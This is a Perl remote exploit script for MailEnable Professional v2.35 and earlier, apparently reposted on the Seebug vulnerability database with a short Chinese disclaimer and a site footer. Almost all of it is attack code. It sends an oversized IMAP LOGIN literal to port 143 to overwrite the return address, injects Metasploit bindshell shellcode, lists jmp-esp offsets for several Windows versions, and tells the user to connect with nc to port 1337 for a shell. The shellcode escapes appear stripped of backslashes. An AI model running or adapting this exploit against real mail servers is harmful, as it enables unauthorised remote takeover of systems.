#!/usr/bin/perl # # maildisable-v6.pl # # Mail Enable Professional <=v2.35 (win32) remote exploit # by mu-b - Tue Dec 5 2006 # # - Tested on: Mail Enable Professional v2.35 (win32) # # Note: timing is quite critical with this!!, so change $send_delay # if it doesn\'t work.... # ######## use Getopt::Std; getopts(\'t:n:\', \\%arg); use Socket; # metasploit win32 bindshell port 1337 my $zshell_win32_bind = \"x33xc9x83xe9xb0\". \"x81xc4xd0xfdxffxff\". \"xd9xeexd9x74x24xf4x5bx81x73x13x1d\". \"xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96\". \"xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2\". \"x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0\". \"xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41\". \"x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82\". \"x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2\". \"x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39\". \"xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9\". \"x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b\". \"x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a\". \"x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88\". \"x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01\". \"xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20\". \"x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e\". \"xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39\". \"x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44\". \"xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96\". \"x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38\". \"xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9\". \"x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09\". \"x4ex33xe4x96xcdxccx32x69\"; # ff e4 -> jmp %esp my @offsets = ( \"xf8xfex5ax7c\", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099 \"xe2x48xe6x77\", # WinXP SP0 KERNEL32.dll 5.1.2600.0 \"x06x38xe6x77\", # WinXP SP1 KERNEL32.dll 5.1.2600.11061 \"xd9xaex80x7c\", # WinXP SP2 KERNEL32.dll 5.1.2600.21802 \"x62x51xebx77\", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300 \"xefxbexadxde\" # DoS ); &print_header; my $target; my $offset; if (defined($arg{\'t\'})) { $target = $arg{\'t\'} } if (defined($arg{\'n\'})) { $offset = $arg{\'n\'} } if (!(defined($target))) { &usage; } if (!(defined($offset))) { $offset = 0; } if ($offset > $#offsets) { print(\"only \".($#offsets+1).\" targets known!! \"); exit(1); } else { $offset = $offsets[$offset]; } my $imapd_port = 143; my $send_delay = 1; my $NOP = \'A\'; my $START_PAD = 547; my $SHELL_PAD = 12; if (connect_host($target, $imapd_port)) { print(\"-> * Connected \"); $buf = \"A001 LOGIN {24}\"; send(SOCKET, $buf.\" \", 0); sleep($send_delay); print(\"-> * Sending payload \"); send(SOCKET, \"AAAAAAAAAAAAAAAAA{20} \", 0); sleep($send_delay); send(SOCKET, \"BBBBBBBBBBBBBBBBBB \", 0); sleep($send_delay); $buf = ($NOP x $START_PAD).# padding $offset. # EIP ($NOP x $SHELL_PAD). $zshell_win32_bind. # hellcode ($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind))); send(SOCKET, $buf, 0); print(\"-> * Successfully sent payload! \"); print(\"-> * nc \".$target.\" 1337 for shell... \"); } sub print_header { print(\"MailEnable Pro <=v2.35 remote exploit \"); print(\"by: <mu-b@digit-labs.org> \"); } sub usage { print(qq(Usage: $0 -t <hostname> -t <hostname> : hostname to test -n <num> : return addy offset number )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die(\"Error: $! \"); $paddr = sockaddr_in($port, $iaddr) || die(\"Error: $! \"); $proto = getprotobyname(\'tcp\') || die(\"Error: $! \"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $! \"); connect(SOCKET, $paddr) || die(\"Error: $! \"); return(1338); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论